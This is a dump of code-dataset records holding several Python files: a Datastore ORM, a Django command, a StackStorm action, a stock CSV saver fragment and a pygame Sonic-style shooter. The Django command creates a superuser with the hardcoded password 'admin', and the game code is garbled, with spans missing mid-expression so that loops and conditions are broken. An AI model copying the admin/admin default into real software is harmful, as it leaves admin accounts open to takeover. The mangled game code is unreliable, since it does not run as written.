SaveToWithStocks(self,fileName, stocks):\n ext = fileName[fileName.rfind('.')+1:]\n path = fileName[:fileName.rfind('/')+1]\n if not os.path.exists(path):\n os.makedirs(path)\n if ext == 'csv':\n self.__saveToCSV(fileName, stocks) \n elif ext == 'xlsx' or ext == 'xls':\n self.__saveToExcel(fileName, stocks)\n \n \nif __name__ == '__main__':\n fileName = u'/Volumes/Data/Downloads/2019-05-02_x.csv'\n destFileName = u'/Volumes/Data/Downloads/2019-05-02_x.xlsx'\n stockCSV = CStockItemIO_CSV()\n stockCSV.ReadFromCSV(fileName)","sub_path":"src/StockDataItemIO/StockItemIO_CSV.py","file_name":"StockItemIO_CSV.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"273876098","text":"from __future__ import annotations\n\nimport os\nimport itertools\nfrom collections import defaultdict\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import Type, Generator, get_args, Dict, ClassVar, Any, Tuple, get_type_hints, Union, Callable, List\n\nfrom google.cloud import datastore\n\nfrom gcp_pilot import exceptions\n\nDEFAULT_NAMESPACE = os.environ.get(\"GCP_DATASTORE_NAMESPACE\", default=None)\nDEFAULT_PK_FIELD = \"id\"\nMAX_ITEMS_PER_OPERATIONS = 500 # Datastore cannot write more than 500 items per call\n\n\ndef _chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\n\n@dataclass\nclass DoesNotExist(Exception):\n cls: Type[EmbeddedDocument]\n filters: Dict\n\n\n@dataclass\nclass MultipleObjectsFound(Exception):\n cls: 
Type[EmbeddedDocument]\n filters: Dict\n\n\ndef _starts_with_operator(lookup_fields, value) -> List[Tuple[str, str, Any]]:\n field_name = \".\".join(lookup_fields)\n return [\n (field_name, \">=\", value),\n (field_name, \"<=\", f\"{value}\\ufffd\"),\n ]\n\n\n@dataclass\nclass Manager:\n lookup_operators: ClassVar[Dict[str, Union[str, Callable]]] = {\n \"eq\": \"=\",\n \"gt\": \">\",\n \"gte\": \">=\",\n \"lt\": \"<\",\n \"lte\": \"<=\",\n \"in\": \"in\",\n \"startswith\": _starts_with_operator,\n }\n\n _client: ClassVar[datastore.Client] = None\n fields: Dict[str, type]\n pk_field: str\n doc_klass: Type[Document]\n kind: str\n\n def get_client(self) -> datastore.Client:\n if not self._client:\n self._client = datastore.Client(namespace=self.get_namespace())\n return self._client\n\n def get_namespace(self):\n return self.doc_klass.Meta.namespace\n\n def build_key(self, pk: Any = None) -> datastore.Key:\n if pk:\n typed_pk = self.doc_klass.Meta.fields[self.pk_field](pk)\n return self.get_client().key(self.kind, typed_pk)\n # If no primary key is provided, we let the server create a new ID\n return self.get_client().allocate_ids(self.get_client().key(self.kind), 1)[0]\n\n def _iterate(self, query, page_size):\n cursor = None\n empty = False\n\n while not empty:\n query_iter = query.fetch(start_cursor=cursor, limit=page_size)\n\n page = next(query_iter.pages, [])\n for item in page:\n yield item\n cursor = query_iter.next_page_token\n empty = not bool(cursor)\n\n def query(\n self,\n distinct_on: str = None,\n order_by: Union[str, List[str]] = None,\n page_size: int = None,\n **kwargs,\n ) -> datastore.query.Iterator:\n # base query\n query = self.get_client().query(kind=self.kind)\n if order_by:\n query.order = order_by\n if distinct_on:\n query.distinct_on = distinct_on\n\n # parse lookup args\n cross_filters = []\n for key, value in kwargs.items():\n all_filters = self._build_filter(key=key, value=value)\n for field_name, operator, field_value in all_filters:\n if operator == \"in\":\n cross_filters.append((field_name, operator, field_value))\n else:\n query.add_filter(field_name, operator, field_value)\n\n if not cross_filters:\n yield from self._iterate(query=query, page_size=page_size)\n else:\n # prepare combinations\n options = defaultdict(list)\n for name, operator, values in cross_filters:\n for value in values:\n options[name].append((name, \"=\", value))\n\n combinations = itertools.product(*list(options.values()))\n\n found = set()\n for combination in combinations:\n current_query = query\n for field_name, operator, value in combination:\n current_query = current_query.add_filter(field_name, operator, value)\n\n for item in self._iterate(query=current_query, page_size=page_size):\n if item.id not in found:\n yield item\n found.add(item.id)\n\n def filter(self, **kwargs) -> Generator[Document, None, None]:\n for entity in self.query(**kwargs):\n yield self.from_entity(entity=entity)\n\n def get(self, **kwargs) -> Document:\n if self.pk_field in kwargs:\n pk = kwargs[self.pk_field]\n entity = self.get_client().get(key=self.build_key(pk=pk))\n if entity:\n return self.from_entity(entity=entity)\n raise DoesNotExist(self.doc_klass, pk)\n\n # Since we can't fetch directly from the key,\n # we filter and hope for just one object\n one_obj = None\n for obj in self.filter(**kwargs):\n if one_obj is not None:\n raise MultipleObjectsFound(self.doc_klass, filters=kwargs)\n one_obj = obj\n if not one_obj:\n raise DoesNotExist(self.doc_klass, filters=kwargs)\n return one_obj\n\n def 
create(self, obj: Document) -> Document:\n entity = self.to_entity(obj=obj)\n self.get_client().put(entity=entity)\n\n # if successfully saved, we assure the auto-generated ID is added to the final object\n if not obj.pk:\n setattr(obj, obj.Meta.pk_field, entity.id)\n return obj\n\n def update(self, pk: str, **kwargs) -> Document:\n if kwargs:\n entity = self.get_client().get(key=self.build_key(pk=pk))\n # TODO: enable partial nested updates\n as_data = {\n key: value.Meta.to_dict(obj=value) if isinstance(value, EmbeddedDocument) else value\n for key, value in kwargs.items()\n }\n entity.update(as_data)\n self.get_client().put(entity=entity)\n return self.get(id=pk)\n\n def delete(self, pk: str = None):\n if pk:\n self.get_client().delete(key=self.build_key(pk=pk))\n else:\n keys = [entity.key for entity in self.query()]\n for chunk in _chunks(keys, MAX_ITEMS_PER_OPERATIONS):\n self.get_client().delete_multi(keys=chunk)\n\n def _build_filter(self, key: str, value: Any) -> List[Tuple[str, str, Any]]:\n operator = None\n\n field_name, *extra = key.split(\"__\")\n if extra:\n if len(extra) > 1:\n raise exceptions.UnsupportedFormatException(f\"Unsupported lookup key format {extra}\")\n operator = extra[0]\n if operator not in self.lookup_operators:\n raise exceptions.UnsupportedFormatException(f\"Unsupported lookup {operator}\")\n if callable(operator):\n return operator(field_name, value)\n\n parts = field_name.split(\".\")\n if len(parts) > 1 and parts[0] not in self.fields:\n raise exceptions.ValidationError(\n f\"{parts[0]} is not a valid field. Excepted one of {' | '.join(self.fields)}\"\n )\n\n return [(field_name, (operator or \"=\"), value)]\n\n def to_entity(self, obj: Document) -> datastore.Entity:\n entity = datastore.Entity(key=self.build_key(pk=obj.pk))\n if not obj.pk:\n setattr(obj, obj.Meta.pk_field, entity.id)\n entity.update(obj.Meta.to_dict(obj=obj))\n return entity\n\n def from_entity(self, entity: datastore.Entity) -> Document:\n data = dict(entity.items())\n if self.pk_field not in data:\n data[self.pk_field] = entity.id\n return self.doc_klass.Meta.from_dict(data=data)\n\n\n@dataclass\nclass Metadata:\n fields: Dict[str, type]\n doc_klass: Type[EmbeddedDocument]\n pk_field: str = None\n namespace: str = DEFAULT_NAMESPACE\n\n def from_dict(self, data: Dict) -> EmbeddedDocument:\n data = data.copy()\n\n def _build(klass: Union[EmbeddedDocument, Callable], value: Any):\n if value is None or klass == Any: # pylint: disable=comparison-with-callable\n return value\n\n if issubclass(klass, EmbeddedDocument):\n return klass.Meta.from_dict(data=value)\n\n if klass == datetime:\n return klass.fromisoformat(str(value))\n\n return klass(value)\n\n parsed_data = {}\n for field_name, field_klass in self.fields.items():\n try:\n raw_value = data[field_name]\n except KeyError:\n continue\n\n if getattr(field_klass, \"_name\", \"\") == \"List\":\n inner_klass = get_args(field_klass)[0] # TODO: test composite types\n item = [_build(klass=inner_klass, value=i) for i in raw_value]\n elif getattr(field_klass, \"_name\", \"\") == \"Dict\":\n inner_klass_key, inner_klass_value = get_args(field_klass)\n item = {\n _build(klass=inner_klass_key, value=k): _build(klass=inner_klass_value, value=v)\n for k, v in raw_value.items()\n }\n else:\n item = _build(klass=field_klass, value=raw_value)\n parsed_data[field_name] = item\n\n return self.doc_klass(**parsed_data)\n\n def to_dict(self, obj: EmbeddedDocument, select_fields: List[str] = None) -> dict:\n # TODO handle custom dynamic fields\n def 
_unbuild(value):\n if value is None:\n return value\n if isinstance(value, EmbeddedDocument):\n return value.Meta.to_dict(obj=value)\n if isinstance(value, Enum):\n return value.value\n return value\n\n data = {}\n for field_name, field_klass in self.fields.items():\n if select_fields and field not in select_fields:\n continue\n\n raw_value = getattr(obj, field_name)\n\n if getattr(field_klass, \"_name\", \"\") == \"List\":\n item = [_unbuild(value=i) for i in raw_value]\n elif getattr(field_klass, \"_name\", \"\") == \"Dict\":\n item = {_unbuild(value=k): _unbuild(value=v) for k, v in raw_value.items()}\n else:\n item = _unbuild(value=raw_value)\n\n data[field_name] = item\n\n return data\n\n\nclass ORM(type):\n def __new__(mcs, name, bases, attrs):\n is_abstract_model = mcs._is_abstract(name=name)\n is_concrete_model = mcs._is_concrete(bases=bases)\n\n if not is_abstract_model:\n # Since it was not explicitly provided, add id: str = None\n if not mcs._has_explicit_pk_field(attrs=attrs, bases=bases) and is_concrete_model:\n attrs[\"__annotations__\"][DEFAULT_PK_FIELD] = int\n attrs[DEFAULT_PK_FIELD] = None\n\n new_cls = super().__new__(mcs, name, bases, attrs)\n\n if is_abstract_model:\n return new_cls\n\n # Metadata initialization\n typed_fields = mcs._extract_fields(klass=new_cls)\n new_cls.Meta = Metadata(\n fields=typed_fields,\n doc_klass=new_cls,\n namespace=getattr(new_cls, \"__namespace__\", None),\n )\n\n # Manager initialization\n if is_concrete_model:\n new_cls.documents = Manager(\n fields=typed_fields,\n pk_field=DEFAULT_PK_FIELD,\n doc_klass=new_cls,\n kind=name,\n )\n\n new_cls.Meta.pk_field = DEFAULT_PK_FIELD\n\n return new_cls\n\n @classmethod\n def _is_abstract(mcs, name: str) -> bool:\n return name in [\"Document\", \"EmbeddedDocument\"]\n\n @classmethod\n def _is_concrete(mcs, bases: Tuple[type]) -> bool:\n return \"Document\" in [base.__name__ for base in bases]\n\n @classmethod\n def _has_explicit_pk_field(mcs, attrs: Dict, bases: Tuple[type]) -> bool:\n if DEFAULT_PK_FIELD in attrs.get(\"__annotations__\", []):\n return True\n\n for base in bases:\n if DEFAULT_PK_FIELD in get_type_hints(base):\n return True\n\n return False\n\n @classmethod\n def _extract_fields(mcs, klass: type) -> Dict[str, type]:\n def _ignore(var_type: str, k: type):\n is_private = var_type.startswith(\"_\")\n is_class_var = getattr(k, \"__origin__\", None) == ClassVar # pylint: disable=comparison-with-callable\n return is_private or is_class_var\n\n hints = get_type_hints(klass)\n typed_fields = {var_type: k for var_type, k in hints.items() if not _ignore(var_type, k)}\n return typed_fields\n\n\n@dataclass\nclass EmbeddedDocument(metaclass=ORM):\n Meta: ClassVar[Metadata]\n\n @classmethod\n def deserialize(cls, **kwargs) -> EmbeddedDocument:\n return cls.Meta.from_dict(data=kwargs)\n\n def serialize(self) -> Dict:\n return self.Meta.to_dict(obj=self)\n\n\n@dataclass\nclass Document(EmbeddedDocument):\n documents: ClassVar[Manager]\n\n @property\n def pk(self):\n return getattr(self, self.Meta.pk_field, None)\n\n def save(self) -> Document:\n return self.documents.create(obj=self)\n\n def delete(self) -> None:\n self.documents.delete(pk=self.id)\n\n\n__all__ = (\n \"DoesNotExist\",\n \"MultipleObjectsFound\",\n \"EmbeddedDocument\",\n \"Document\",\n)\n","sub_path":"gcp_pilot/datastore.py","file_name":"datastore.py","file_ext":"py","file_size_in_byte":13305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"449833692","text":"from 
django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\n\nclass Command(BaseCommand):\n help = 'Create Initial User and Data'\n\n def handle(self, *args, **kwargs):\n try:\n admin = User.objects.create_superuser('admin', 'admin@admin.cc', 'admin')\n admin.profile.is_admin = True\n admin.save()\n self.stdout.write('Successfully created superuser.')\n except IntegrityError:\n self.stdout.write('Superuser exists already.')\n","sub_path":"survey/management/commands/initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"176850372","text":"#!/usr/bin/env python\n\nimport json\nimport csv\n\n# Needs to be run in a Stackstorm virtualenv\nfrom st2actions.runners.pythonrunner import Action\n\n\nclass ReadProjectsEmailFile(Action):\n\n def run(self, file_path, projects):\n\n projects_list = projects['projects']\n\n result = {}\n\n with open(file_path) as csv_file:\n reader = csv.DictReader(csv_file, delimiter=';')\n for row in reader:\n project = row['project']\n if project in projects_list:\n result[project] = row['email']\n\n if len(projects_list) == len(result.keys()):\n self.logger.info(\"Projects given and projects found in file did match...\")\n return True, result\n else:\n self.logger.error(\"Projects given and projects found in file did not match!\")\n return False, {}\n","sub_path":"actions/read_projects_email_file.py","file_name":"read_projects_email_file.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525145341","text":"import random, pygame, sys\nimport threading\n\nfrom playsound import playsound\nfrom pygame.locals import *\nfrom multiprocessing import Process\n\n# Declaración de constantes y variables\nWHITE = (255, 255, 255)\n\n# Función principal del juego\n# Array de sonics que vienen volando haciendo la rueda\nsonics=[]\n# Array de sonics muertos en la animación de morir\nsonicsmuertos=[]\n#Array de disparos\ndisparos=[]\n\n#Define si la partida está activa o se ha acabado\npartida = True\n\n#Reproduce el sonido de pasarse el nivel\ndef fxnivelpasado():\n playsound('nivelpasado.wav', False)\n\n#Reproduce la música de marble zone\ndef musicasonicmarblednb():\n pygame.mixer.music.load('musicasonicmarblednb.mp3')\n\n pygame.mixer.music.play(0)\n\n#Reproduce la música del robotnik\ndef musicarobotnik1():\n pygame.mixer.music.load('robotnikmusic1.mp3')\n pygame.mixer.music.play(0)\n\n#Música del game over\ndef musicagameover():\n pygame.mixer.music.load('gameover.mp3')\n pygame.mixer.music.play(0)\n\n#Clase que se utiliza para devolver la puntuación, el número de vidas y si se ha pasado un nivel\nclass Status():\n def __init__(self):\n self.puntuacion = 0\n self.vidas = 5\n self.pasado = False\n\n#Clase disparo, almacena la posición del disparo y el rect\nclass DisparoA(pygame.sprite.Sprite):\n def __init__(self,x,y):\n pygame.sprite.Sprite.__init__(self)\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x, self.y,3,3)\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,3,3)\n\n#Almacena un sonic en animación de morir, su posición y velocidad inicial hacia arriba\nclass Sonicmuerto(pygame.sprite.Sprite):\n def __init__(self,x,y):\n pygame.sprite.Sprite.__init__(self)\n self.x = x\n self.y = y\n self.velocidad = -10\n\n#Almacena un sonic que viene volando 
haciendo la rueda\n#Su posición, su punto de destino (donde estaba la nave al aparecer)\nclass Sonic(pygame.sprite.Sprite):\n def __init__(self,destx,desty,nivel):\n pygame.sprite.Sprite.__init__(self)\n #Posición X, la inicial es siempre 370 fuera de la pantalla por la derecha\n self.x = 370\n #Posición y se decide aleatoriamente al crear el sonic\n self.y = random.randrange(1,224)\n #Posición del recorte de la animación del sprite empieza en 0\n self.possonic = 0\n #Coordenada x de destino de la trayectoria\n self.destx = destx\n #Coordenada y de destino de la trayectoria\n self.desty = desty\n #Rectángulo de colisión 50x50\n self.rect = pygame.Rect(self.x,self.y,50,50)\n #En el nivel 2 también existe la componente velocidad que se decide aleatoriamente\n if nivel==2:\n self.velocidady = random.randrange(-10,10)\n self.velocidadx = random.randrange(-5,-1)\n #Actualiza el rectángulo de colisión\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,50,50)\n\n#Almacena un robotnik\nclass Robotnik(pygame.sprite.Sprite):\n def __init__(self):\n #posición x\n self.x = 500\n #posición y se decide aleatoriamente\n self.y = random.randrange(0,80)\n #velocidad hacia la izquierda\n self.velocidady = 100\n #Rectángulo de colisión de 50 x 50\n self.rect = pygame.Rect(self.x,self.y,50,50)\n #Velocidad horizontal\n self.velocidadx = 0\n #vida del robotnik\n self.vida = 64\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,50,50)\n\n#Almacena el sonic en el nivel de sonic\nclass Sonicuno(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n #posición anterior x\n self.xanterior=125\n #posición\n self.x = 125\n self.y = 148\n #velocidad\n self.velocidadx = 0\n self.velocidady = 0\n #si mira hacia la izquierda o hacia la derecha\n self.sentido = False\n #Frame del sonic actual mientras corre 0 si está parado\n self.estado = 0\n #Si el sonic está saltando\n self.saltando = False\n #Frame del salto\n self.estadosaltando = 0\n #Rectángulo de colisión 50x50\n self.rect = pygame.Rect(self.x,self.y,50,50)\n #Actualiza el rectángulo de colisión\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,50,50)\n #Mueve el sonic según la velocidad en un frame\n def mueve(self):\n self.x += self.velocidadx\n #Cambia el sentido del sonic\n def cambiasentido(self,sentido):\n self.sentido = sentido\n #Cambia el estado o frame al caminar\n def cambiaestado(self):\n if self.estado==6:\n self.estado = 1\n else:\n self.estado += 1\n #Cambia el estado al saltar o frames\n def cambiaestadosaltando(self):\n if self.estadosaltando == 4:\n self.estadosaltando = 0\n else:\n self.estadosaltando += 1\n #Pone el sonic parado\n def ponparado(self):\n self.estado = 0\n\n#Clase que almacena la nave\nclass Nave(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.x = 10\n self.y = 10\n self.posnave = 44\n self.rect = pygame.Rect(self.x,self.y,5,5)\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,5,5)\n\n#Borra un sonic\ndef borrasonic(pos):\n sonics.pop(pos)\n#Borra un sonic muerto al caer debajo\ndef borrasonicmuerto(pos):\n sonicsmuertos.pop(pos)\n#Borra un disparo\ndef borradisparo(pos):\n disparos.pop(pos)\n#Crea un sonic enemigo nuevo\ndef creasonic(personaje_x, personaje_y, nivel):\n sonics.append(Sonic(personaje_x,personaje_y, nivel))\n#Crea un disparo\ndef creadisparo(x,y):\n disparos.append(DisparoA(x,y))\n#Fin de la partida\ndef gameover(screen):\n clock = pygame.time.Clock()\n continua = False\n 
imagengameover = pygame.image.load('gameover.png').convert()\n musicagameover()\n cont=0\n while not continua:\n clock.tick(60)\n if cont<100:\n cont+=1\n screen.blit(imagengameover, (0, 0))\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n if cont==100:\n if event.key == pygame.K_SPACE:\n continua = True\n elif event.key == pygame.K_q:\n pygame.quit()\n sys.exit(0)\n pygame.display.update()\n\n#Muestra que el nivel está pasado\ndef muestrapasado(screen):\n clock = pygame.time.Clock()\n black = 0, 0, 0\n cont = 0\n screen.fill(black)\n font = pygame.font.Font(pygame.font.get_default_font(), 12)\n continua = False\n\n while not continua:\n clock.tick(60)\n textsurface = font.render('Congratulations Game Completed ', False, (255, 255, 255))\n screen.blit(textsurface,(70,70))\n textsurface = font.render('Developed by: Artur Viader Mataix ', False, (255, 255, 255))\n screen.blit(textsurface,(70,140))\n \n if cont<100:\n cont+=1\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n if cont==100:\n continua = True\n if event.key == pygame.K_q:\n pygame.quit()\n sys.exit(0)\n pygame.display.update()\n\n#Nivel de sonic\ndef fasesonic(screen,nivel,status):\n partida = True\n sonicimagen = pygame.image.load(\"sonic.gif\").convert()\n sonicimageni = pygame.transform.flip(sonicimagen,True,False)\n robotniki = pygame.image.load(\"robotnik.gif\").convert()\n imagenitems = pygame.image.load(\"items.gif\").convert()\n pressed_up = False\n pressed_down = False\n pressed_left = False\n pressed_right = False\n clock = pygame.time.Clock()\n fondo = pygame.image.load('fondo2.png').convert()\n posfondox = 2\n pygame.font.init()\n font = pygame.font.Font(pygame.font.get_default_font(), 10)\n robotniks=[]\n personaje = Sonicuno()\n contavariavelocidad = 0\n contapierdevelocidad = 0\n contcambiaestado = 0\n empiezarobotniks = False\n robotnikshechos = False\n frecuenciarobotniks = 100\n controbotniks = 10\n controbotniks = 0\n posbandera = 8000\n girandobandera = False\n recortebandera = 275\n contabandera = 1\n puntuacion = status.puntuacion\n vidas = status.vidas\n\n contaralentizabandera = 0\n personaje.updateposition()\n fxrobotnikimpacto = pygame.mixer.Sound('S1_AC.wav')\n fxsonicsalto = pygame.mixer.Sound(\"S1_A0.wav\")\n while partida:\n clock.tick(60)\n\n screen.blit(fondo, (posfondox, -4))\n if(posbandera<=320 or posbandera >=0):\n if girandobandera:\n if contaralentizabandera == 4:\n contaralentizabandera = 0\n recortebandera += 50 * contabandera\n contabandera+=1\n if contabandera == 16:\n partida = False\n else:\n contaralentizabandera += 1\n screen.blit(imagenitems, (posbandera, 148), (recortebandera, 29, 50, 50))\n\n if posbandera <= 160:\n girandobandera = True\n\n\n contarobotniks = 0\n while contarobotniks 0:\n contcambiaestado += 1\n if contcambiaestado >= 11 - (personaje.velocidadx):\n contcambiaestado =0\n personaje.cambiaestado()\n personaje.cambiasentido(False)\n elif personaje.velocidadx<0:\n contcambiaestado += 1\n if contcambiaestado >= 11 - (personaje.velocidadx * -1):\n contcambiaestado =0\n personaje.cambiaestado()\n personaje.cambiasentido(True)\n else:\n personaje.ponparado()\n\n if personaje.saltando:\n personaje.updateposition()\n screen.blit(sonicimagen, (personaje.x, personaje.y), (personaje.estadosaltando * 48, 144, 50, 50))\n\n personaje.cambiaestadosaltando()\n else:\n if 
personaje.sentido:\n if personaje.estado == 0:\n screen.blit(sonicimagen, (personaje.x, personaje.y), (284, 0, 50, 50))\n else:\n screen.blit(sonicimagen, (personaje.x, personaje.y), (48*personaje.estado, 0, 50, 50))\n else:\n if personaje.estado == 0:\n screen.blit(sonicimageni,(personaje.x, personaje.y), (188,0,50,50))\n else:\n screen.blit(sonicimageni, (personaje.x, personaje.y), (48*11 - 48*personaje.estado, 0, 50, 50))\n\n textsurface = font.render('Score ' + str(puntuacion), False, (0, 0, 255))\n screen.blit(textsurface,(0,0))\n textsurface = font.render('VIDAS ' + str(vidas), False, (0, 255, 255))\n screen.blit(textsurface,(275 ,200))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit(0)\n\n if event.type == pygame.KEYDOWN: # check for key presses\n if event.key == pygame.K_LEFT: # left arrow turns left\n pressed_left = True\n posanterior = personaje.x\n elif event.key == pygame.K_RIGHT: # right arrow turns right\n pressed_right = True\n posanterior = personaje.x\n elif event.key == pygame.K_UP: # up arrow goes up\n pressed_up = True\n elif event.key == pygame.K_DOWN: # down arrow goes down\n pressed_down = True\n elif event.key == pygame.K_SPACE:\n if not personaje.saltando:\n fxsonicsalto.play()\n personaje.saltando = True\n personaje.velocidady = -15\n personaje.possaltando = 0\n elif event.key == pygame.K_q:\n pygame.quit()\n sys.exit(0)\n elif event.type == pygame.KEYUP: # check for key releases\n if event.key == pygame.K_LEFT: # left arrow turns left\n contavariavelocidad = 0\n contapierdevelocidad = 0\n pressed_left = False\n elif event.key == pygame.K_RIGHT: # right arrow turns right\n contavariavelocidad = 0\n contapierdevelocidad = 0\n pressed_right = False\n elif event.key == pygame.K_UP: # up arrow goes up\n pressed_up = False\n elif event.key == pygame.K_DOWN: # down arrow goes down\n pressed_down = False\n #if pressed_up == True:\n\n #if pressed_down == True:\n if contavariavelocidad == 0:\n if pressed_right == True:\n if posbandera <0:\n personaje.ponparado()\n personaje.velocidadx = 0\n else:\n if personaje.velocidadx>=-12:\n personaje.velocidadx -= 1\n contavariavelocidad = 4\n if pressed_left == True:\n\n if posbandera >= 8200:\n personaje.ponparado()\n personaje.velocidadx = 0\n else:\n if personaje.velocidadx<=12:\n personaje.velocidadx += 1\n contavariavelocidad = 4\n else:\n contavariavelocidad -= 1\n\n if contapierdevelocidad == 0:\n if pressed_left == False and pressed_right == False:\n if personaje.velocidadx>0:\n personaje.velocidadx -=1\n elif personaje.velocidadx<0:\n personaje.velocidadx +=1\n contapierdevelocidad = 5\n else:\n contapierdevelocidad -= 1\n posbandera += personaje.velocidadx\n posfondox += personaje.velocidadx\n personaje.y += personaje.velocidady\n\n if posfondox<-3073:\n if not robotnikshechos:\n empiezarobotniks = True\n posfondox=0\n elif posfondox>0:\n if not robotnikshechos:\n empiezarobotniks = True\n posfondox=-3073;\n #personaje.mueve()\n personaje.xanterior = personaje.x\n\n personaje.updateposition()\n\n pygame.display.update()\n status.puntuacion = puntuacion\n status.pasado = True\n return status\n\n#Nivel normal\ndef fase(screen,nivel,status):\n partida = True\n sonics.clear()\n sonicsmuertos.clear()\n disparos.clear()\n naveimagen = pygame.image.load(\"nave.png\").convert()\n sonicimagen = pygame.image.load(\"sonic.gif\").convert()\n robotniki = pygame.image.load(\"robotnik.gif\").convert()\n robotnik = Robotnik()\n #Cambia el fondo según el nivel\n if nivel==1:\n fondo = 
pygame.image.load('fondo.jpeg').convert()\n elif nivel ==2:\n fondo = pygame.image.load('fondo2.png').convert()\n elif nivel == 4:\n fondo = pygame.image.load('fondov.jpg').convert()\n frecsonics = 35\n\n contsonics=0\n vidas = status.vidas\n puntuacion = status.puntuacion\n clock = pygame.time.Clock()\n pygame.font.init()\n font = pygame.font.Font(pygame.font.get_default_font(), 10)\n izquierdapulsado=0\n derechapulsado=0\n arribapulsado=0\n abajopulsado=0\n nave = Nave()\n\n # Bucle principal\n cont=0\n contasonic=0\n contcreasonic=0\n contmostrando = 0\n mostrandonave = False\n pressed_up = False\n pressed_down = False\n pressed_left = False\n pressed_right = False\n parpadeando = False\n contparpadeo = 0\n #música según el nivel\n if nivel == 1:\n musicasonicmarblednb()\n elif nivel == 4:\n musicarobotnik1()\n contcolisiones = 0\n maxcolisiones = 0\n pasado = False\n #Carga sonidos fx en memoria\n disparoa = pygame.mixer.Sound('disparoa.wav');\n sonicmuere = pygame.mixer.Sound('sonicmuere.wav');\n fxpierdevida = pygame.mixer.Sound('S1_A6.wav');\n fxmuere = pygame.mixer.Sound('S1_B9.wav')\n fxrobotnikimpacto = pygame.mixer.Sound('S1_AC.wav')\n maxfondo = 0\n if nivel == 1 or nivel == 2:\n maxfondo = -3320\n\n while partida:\n clock.tick(60)\n # 1.- Se dibuja la pantalla\n #screen.fill(WHITE)\n\n if nivel==1:\n screen.blit(fondo, (cont, 0))\n elif nivel ==2:\n screen.blit(fondo, (cont, -5))\n elif nivel ==4:\n screen.blit(fondo, (-nave.x * 1.2, -nave.y*1.2))\n\n\n screen.blit(robotniki, (robotnik.x, robotnik.y),(0,0,60,60))\n robotnik.velocidadx = (nave.x- robotnik.x) / 200\n robotnik.velocidady = (nave.y - robotnik.y) /200\n robotnik.x += robotnik.velocidadx\n robotnik.y += robotnik.velocidady\n\n robotnik.updateposition()\n if parpadeando == False:\n if pygame.sprite.collide_rect(robotnik,nave):\n vidas -= 1\n if vidas == 0:\n fxmuere.play()\n else:\n fxpierdevida.play()\n parpadeando = True\n contparpadeo = 90\n if vidas == 0:\n partida = False\n\n if parpadeando:\n if contparpadeo == 0:\n parpadeando = False\n else:\n contparpadeo -= 1\n if mostrandonave:\n screen.blit(naveimagen, (nave.x, nave.y),(0,nave.posnave,35,22))\n if contmostrando == 4:\n contmostrando = 0\n if mostrandonave:\n mostrandonave = False\n else:\n mostrandonave = True\n else:\n contmostrando += 1\n else:\n screen.blit(naveimagen, (nave.x, nave.y),(0,nave.posnave,35,22))\n\n contsonics=0\n while contsonics nave.y:\n sonics[contsonics].y -=1\n elif sonics[contsonics].y < nave.y:\n sonics[contsonics].y +=1\n\n elif nivel == 2:\n sonics[contsonics].y += sonics[contsonics].velocidady\n if sonics[contsonics].y<0 or sonics[contsonics].y>224:\n sonics[contsonics].velocidady = sonics[contsonics].velocidady * -1\n if sonics[contsonics].velocidady > 0:\n sonics[contsonics].velocidady += 1\n else:\n sonics[contsonics].velocidady -= 1\n sonics[contsonics].x += sonics[contsonics].velocidadx\n posactual = sonics[contsonics].possonic\n if contasonic == 2:\n if posactual < int(148):\n sonics[contsonics].possonic = sonics[contsonics].possonic + 50\n else:\n sonics[contsonics].possonic = 0\n\n sonics[contsonics].updateposition()\n\n if parpadeando == False:\n if pygame.sprite.collide_rect(sonics[contsonics],nave):\n\n vidas -= 1\n if vidas == 0:\n fxmuere.play()\n else:\n fxpierdevida.play()\n parpadeando = True\n contparpadeo = 90\n if vidas == 0:\n partida = False\n sal = False\n encontrado = False\n contdisparos = 0\n while sal==False:\n if contdisparos224:\n borrasonicmuerto(contsonicsmuertos)\n else:\n 
sonicsmuertos[contsonicsmuertos].y += sonicsmuertos[contsonicsmuertos].velocidad\n sonicsmuertos[contsonicsmuertos].velocidad += 1\n screen.blit(sonicimagen, (sonicsmuertos[contsonicsmuertos].x, sonicsmuertos[contsonicsmuertos].y), (240, 145, 50, 50))\n contsonicsmuertos += 1\n\n\n\n\n if cont 0:\n nave.y -=1\n nave.updateposition()\n nave.posnave = 22\n\n if pressed_down == True:\n\n if nave.y<202:\n nave.y +=1\n nave.updateposition()\n nave.posnave = 0\n if pressed_left == True:\n if nave.x>0:\n nave.x -= 1\n nave.updateposition()\n if pressed_right == True:\n if nave.x<285:\n nave.x +=1\n nave.updateposition()\n if pressed_up == False and pressed_down == False:\n nave.posnave = 44\n\n if contcreasonic == frecsonics:\n creasonic(nave.x, nave.y, nivel)\n contcreasonic =0\n else:\n if contcreasonic > 500:\n partida = False\n pasado = True\n fxnivelpasado()\n contcreasonic +=1\n if contasonic == 2:\n contasonic = 0\n else:\n contasonic +=1\n\n\n # 3.- Se actualiza la pantalla\n pygame.display.update()\n status.vidas = vidas\n 